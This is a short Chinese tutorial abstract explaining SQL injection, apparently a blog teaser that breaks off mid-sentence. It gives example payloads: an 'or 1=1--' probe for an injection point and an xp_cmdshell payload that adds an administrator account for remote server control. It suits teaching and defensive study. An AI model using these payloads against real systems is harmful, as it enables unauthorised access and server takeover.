摘要： SQL注入的原理什么SQL注入将SQL代码插入到应用程序的输入参数中，之后，SQL代码被传递到数据库执行。从而达到对应用程序的攻击目的。注入原理常见攻击方法检测是否可以注入【检测注入点】示例：http://192.168.0.1/temp.aspx?id=a or 1=1--如果上面语句可以执行说明可以实现注入，则可以利用系统过程、系统表注入数据库示例【给系统添加一个用户，黑客可以实现远程登录控制服务器】：http://192.168.0.1/temp.aspx?id=1;exec xp_cmdshell 'net user admin 123456 /add'绕过程序的限制示 阅读全文